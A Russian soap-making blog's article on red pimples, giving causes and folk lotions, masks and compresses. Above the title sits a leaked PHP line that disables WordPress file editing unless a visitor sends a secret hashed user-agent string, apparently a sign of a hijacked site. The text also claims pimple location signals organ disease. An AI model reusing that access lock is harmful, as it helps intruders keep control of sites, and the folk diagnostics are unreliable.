if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } Красные прыщики: избавляемся от них с помощью натуральной косметики! | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

Красные прыщики: избавляемся от них с помощью натуральной косметики!

Красные прыщи добавляют массу хлопот. Обычные тональные средства только усугубляют проблему. Лечение должно быть комплексным и без средств народной медицины не обойтись.

Крас­ные пры­щи – это рас­про­стра­нен­ная про­бле­ма и стра­да­ют от нее не толь­ко под­рост­ки. Все чаще встре­ча­ют­ся люди, кото­рые дав­но про­шли про­цесс поло­во­го созре­ва­ния, но, к сожа­ле­нию, угре­вая болезнь не про­шла. Крас­ные пры­щи мел­кие, толь­ко их мно­го­чис­лен­ное коли­че­ство достав­ля­ет нема­ло хло­пот и пор­тит внеш­ний вид.

Девуш­ки пыта­ют­ся замас­ки­ро­вать их при помо­щи кос­ме­ти­ки, чем толь­ко усу­губ­ля­ют состо­я­ние кожи. Крас­ные пры­щи, как пра­ви­ло, зани­ма­ют более 50% кож­но­го покро­ва лица. Изба­вить­ся от них мож­но. Но про­цесс дол­гий и доволь­но труд­ный. Уход за кожей лица дол­жен быть гра­мот­ным, поэто­му кон­суль­та­ция с дер­ма­то­ло­гом лиш­ней не будет.

Причины появления прыщей

Для эффек­тив­но­го избав­ле­ния от крас­ных пры­щей необ­хо­ди­мо опре­де­лить при­чи­ну их появ­ле­ния. В про­тив­ном слу­чае ника­кая кос­ме­ти­ка в домаш­них усло­ви­ях не помо­жет вер­нуть лицу кра­си­вый и здо­ро­вый вид.

165

Сре­ди рас­про­стра­нен­ных при­чин угре­вой болез­ни кос­ме­то­ло­ги выделяют:

  • гор­мо­наль­ный сбой в организме;
  • непра­виль­ное пита­ние, вслед­ствие чего воз­ни­ка­ют про­бле­мы с рабо­той желудка;
  • зло­упо­треб­ле­ние алко­го­лем, жир­ной и жаре­ной пищей;
  • куре­ние;
  •  нару­ше­ния в рабо­те саль­ных желез и загряз­нен­ные поры кож­но­го покрова.

Так­же крас­ные пры­щи в зави­си­мо­сти от рас­по­ло­же­ния сви­де­тель­ству­ют о нали­чии забо­ле­ва­ний внут­рен­них орга­нов. Напри­мер, вос­па­ле­ния на щеках гово­рят о воз­мож­ных про­бле­мах с кишеч­ни­ком или пече­нью. Пры­щи на носу могут быть сиг­на­лом о нару­ше­ни­ях рабо­ты сер­деч­но-сосу­ди­стой систе­мы. Лечеб­ная кос­ме­ти­ка в таком слу­чае не поможет.

Методы избавления от прыщей

Как пока­зы­ва­ет прак­ти­ка, мно­гие для лече­ния крас­ных пры­щей огра­ни­чи­ва­ют­ся при­ме­не­ни­ем толь­ко кос­ме­ти­че­ских средств. Они лишь помо­га­ют облег­чить состо­я­ние кожи, но навсе­гда от про­бле­мы не изба­вят. В ито­ге визи­ты к вра­чу дове­дет­ся совер­шать часто. Про­цесс лече­ния услов­но делит­ся на 3 составляющих:

  1. В сало­нах кра­со­ты при помо­щи раз­лич­ных видов чист­ки уби­ра­ют­ся вос­па­ле­ния любых раз­ме­ров. Осо­бой попу­ляр­но­стью поль­зу­ет­ся уль­тра­зву­ко­вая чистка.
  2. При­ме­не­ние пре­па­ра­тов по назна­че­нию вра­ча. Обыч­но исполь­зу­ют мази. Напри­мер, «Зине­рит» или «Кури­озин».
  3. Сред­ства народ­ной меди­ци­ны. Но они помо­га­ют устра­нить толь­ко мел­кие пры­щи. Для это­го исполь­зу­ют ком­прес­сы из тра­вя­ных отва­ров, лосьо­ны и мас­ки. Рецеп­ты для их при­го­тов­ле­ния мож­но уточ­нить у косметолога.

Как пра­ви­ло, док­то­ра назна­ча­ют лекар­ствен­ные пре­па­ра­ты для лече­ния изнут­ри, а кос­ме­то­ло­ги помо­га­ют очи­стить кож­ный покров от высыпаний.

Рецепты народной медицины от прыщей

1373793660_exfoliate-to-get-rid-of-acne

Для избав­ле­ния от крас­ных пры­щей, достав­ля­ю­щих мно­же­ство хло­пот, необ­хо­ди­мо тща­тель­но и гра­мот­но уха­жи­вать за кожей лица. Лосьо­ны и мас­ки для еже­днев­но­го при­ме­не­ния будут эффек­тив­ны толь­ко в ком­плек­се с кур­сом лечения.

Лосьоны

Рецеп­ты лосьо­нов раз­но­об­раз­ны, но сре­ди них сто­ит выде­лить самые эффек­тив­ные, кото­рые под­хо­дят для любо­го типа кожи.

Сто­ло­вую лож­ку цве­тов кален­ду­лы залить несколь­ки­ми ста­ка­на­ми кру­то­го кипят­ка. Оста­вить наста­и­вать­ся на 30 минут, после чего про­це­дить. Про­ти­рать лицо лосьо­ном 2–3 раза в день.

Лосьон из алоэ мож­но при­ме­нять толь­ко при усло­вии, что высы­па­ния уже появи­лись. Для его при­го­тов­ле­ния необ­хо­ди­мо сре­зать ниж­ние листья алоэ и поло­жить их на пару недель в холо­диль­ник. После отжать сок, пред­ва­ри­тель­но мел­ко измельчив.

Сырой кар­то­фель нате­реть на мел­кой тер­ке, а затем отжать сок, завер­нув в мар­лю. Про­ти­рать кожу 2–3 раза в день.

Лосьо­ны из нату­раль­ных ингре­ди­ен­тов мож­но сме­ло назвать бес­плат­ной косметикой.

Маски

Мас­ки не толь­ко очи­стят поры, но и сузят их.

Яич­ный белок хоро­шо взбить, что­бы полу­чи­лась белая пена. Нане­сти на лицо и подер­жать 10–15 минут до пол­но­го высы­ха­ния. Во вре­мя про­це­ду­ры будет ощу­щать­ся стя­ну­тость. При­ме­нять бел­ко­вую мас­ку сле­ду­ет через день, чаще кос­ме­то­ло­ги кате­го­ри­че­ски не советуют.

Примочки и компрессы

Зава­рить зеле­ный чай. Про­мо­чить в нем мар­лю или лег­кую ткань, и нало­жить на все лицо. Жела­тель­но подер­жать не менее 10 минут.

Обыч­ную соду раз­ве­сти до каше­об­раз­но­го состо­я­ния водой ком­нат­ной тем­пе­ра­ту­ры или гелем для умы­ва­ния. Состав накла­ды­вать толь­ко на вос­па­лен­ные участ­ки кожи. Дер­жать не более мину­ты. Повто­рять про­це­ду­ру 1 раз в день.

Так­же часто для лече­ния угре­вой болез­ни для начи­на­ю­щих сове­ту­ют при­ме­нять гли­ну. Она быва­ет несколь­ких видов. Их под­би­ра­ют в зави­си­мо­сти от типа кожи. Напри­мер, для чув­стви­тель­ной кожи под­хо­дит белая гли­на, для сухой – голу­бая, для жир­ной – зеле­ная. Чер­ную гли­ну мож­но исполь­зо­вать при любом типе кожи. Обыч­но ее раз­во­дят водой, но кос­ме­то­ло­ги сове­ту­ют исполь­зо­вать отва­ры трав (ромаш­ки, чере­ды, мяты и дру­гих). По жела­нию мож­но доба­вить несколь­ко капель люби­мо­го эфир­но­го масла.

Не нуж­но рас­смат­ри­вать тональ­ные сред­ства как лечеб­ную кос­ме­ти­ку. Они толь­ко мас­ки­ру­ют про­бле­мы кожи на вре­мя. Угре­вую болезнь необ­хо­ди­мо лечить комплексно.


И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!
Автор: Мыльная принцесса

С детства люблю все делать своими руками и вот мыловарение - одно из хобби, которое затянуло. Решила сделать портал mylce.ru, которое поможет вам - новичкам и профессионалам сделать классное натуральное мыло своими руками! Найти меня можно здесь: Website | Facebook | Twitter | Читайте все мои записи!